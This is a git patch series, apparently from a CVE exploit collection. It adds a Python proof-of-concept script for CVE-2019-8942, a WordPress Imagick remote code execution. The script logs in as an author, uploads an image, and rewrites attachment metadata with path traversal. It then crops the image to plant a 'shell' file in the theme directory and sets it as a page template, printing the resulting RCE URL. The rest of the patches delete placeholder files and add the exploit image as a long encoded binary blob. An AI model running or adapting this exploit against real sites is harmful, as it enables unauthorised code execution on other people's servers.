@@ -0,0 +1,97 @@ +#!/usr/bin/python3 + +###################### +## Imagick RCE POC ## +###################### +import requests +import re + +url_root = 'http://localhost/' +theme = 'twentyseventeen' +current_date = '2019/03/' +filename = "imagick.jpg" + +session = requests.Session() +creds={'log':'author','pwd':'author','wp-submit':'Log In','redirect_to':'{url}wp-admin/'.format(url=url_root),'testcookie':1} +tmp={'wordpress_test_cookie':'WP Cookie check'} +r=session.post(url_root+'wp-login.php',cookies=tmp,data=creds) +wp_init_cookies=session.cookies + +#get nonce +response = requests.get('{url}wp-admin/media-new.php'.format(url=url_root),cookies=wp_init_cookies) +_wp_nonce = re.findall(r'name="_wpnonce" value="(\w+)"',response.text)[0] + + +#uploading image +data = { + 'post_id': '0', + '_wp_http_referer': '/wp-admin/media-new.php', + '_wpnonce': _wp_nonce, + 'action': 'upload_attachement', + 'html-upload': 'Upload' +} +evil = {'async-upload':(filename, open(filename, 'rb'))} +upload_result = session.post(url_root+'wp-admin/async-upload.php', data=data, files=evil, cookies=wp_init_cookies) +image_id=upload_result.text +print(f'Image ID: {image_id}') + +#First exploit :changing metadata +#Part 1 create folder ==> evil.jpg?/x +response=requests.get(url_root+'wp-admin/post.php?post='+image_id+'&action=edit',cookies=wp_init_cookies) +_wpnonce=re.findall(r'name="_wpnonce" value="(\w+)"',response.text)[0] +ajax_nonce = re.findall(r'imageEdit\.open\( \w+, "(\w+)"',response.text)[0] +print(ajax_nonce) +data={'_wpnonce':_wpnonce, +'action':'editpost', +'post_ID':image_id, +'meta_input[_wp_attached_file]':current_date+filename+'?/x' +} +response=requests.post(url_root+'wp-admin/post.php',data=data, cookies=wp_init_cookies) + +#Creating file with wrop-image +data={'action':'crop-image', +'_ajax_nonce':ajax_nonce, +'id':image_id, +'cropDetails[x1]':0, +'cropDetails[y1]':0, +'cropDetails[width]':400, +'cropDetails[height]':300, +'cropDetails[dst_width]':10, 
+'cropDetails[dst_height]':10} +response=requests.post(url_root+'wp-admin/admin-ajax.php',data=data, cookies=wp_init_cookies) + +#Part 2 creating file into current theme +data={'_wpnonce':_wpnonce, +'action':'editpost', +'post_ID':image_id, +'meta_input[_wp_attached_file]':current_date+filename+'?/../../../../themes/'+theme+'/shell' +} +response=requests.post(url_root+'wp-admin/post.php',data=data, cookies=wp_init_cookies) +data={'action':'crop-image', +'_ajax_nonce':ajax_nonce, +'id':image_id, +'cropDetails[x1]':0, +'cropDetails[y1]':0, +'cropDetails[width]':400, +'cropDetails[height]':300, +'cropDetails[dst_width]':10, +'cropDetails[dst_height]':10} +response=requests.post(url_root+'wp-admin/admin-ajax.php',data=data, cookies=wp_init_cookies) +print(response.text) + +#Including into theme +response=requests.post(url_root+'wp-admin/post-new.php', cookies=wp_init_cookies) +_wpnonce=re.findall(r'name="_wpnonce" value="(\w+)"',response.text)[0] +post_id=re.findall(r'"post":{"id":(\w+),',response.text)[0] +print(f'Post ID: {post_id}') + +data={'_wpnonce':_wpnonce, +'action':'editpost', +'post_ID':post_id, +'post_title':'wut', +'post_name':'wut', +'meta_input[_wp_page_template]':'cropped-shell.jpg' +} +response=requests.post(url_root+'wp-admin/post.php',data=data, cookies=wp_init_cookies) + +print(f'Rce at {url_root}?p={post_id}') \ No newline at end of file From 1904aa68605b233d07618c51779c38a24c0c6b30 Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:28:35 +0000 Subject: [PATCH 023/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/WordPress/2019/CVE-2019-8942/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/WordPress/2019/CVE-2019-8942/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/WordPress/2019/CVE-2019-8942/.keep 
diff --git a/cve/WordPress/2019/CVE-2019-8942/.keep b/cve/WordPress/2019/CVE-2019-8942/.keep deleted file mode 100644 index e69de29b..00000000 From 4c59f4952d1f867f08b0dd1e8eb9b618ec0b3341 Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:28:47 +0000 Subject: [PATCH 024/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/WordPress/2019/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/WordPress/2019/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/WordPress/2019/.keep diff --git a/cve/WordPress/2019/.keep b/cve/WordPress/2019/.keep deleted file mode 100644 index e69de29b..00000000 From 270c5cee8b06bd5d113db381e2cd3b897765c9e7 Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:30:04 +0000 Subject: [PATCH 025/109] image used Signed-off-by: bbj --- cve/WordPress/2019/CVE-2019-8942/imagick.jpg | Bin 0 -> 28561 bytes 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/WordPress/2019/CVE-2019-8942/imagick.jpg 
diff --git a/cve/WordPress/2019/CVE-2019-8942/imagick.jpg b/cve/WordPress/2019/CVE-2019-8942/imagick.jpg new file mode 100644 index 0000000000000000000000000000000000000000..26bf6fdc1ad140fd556848ef597d11d9a38efc15 GIT binary patch literal 28561 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 
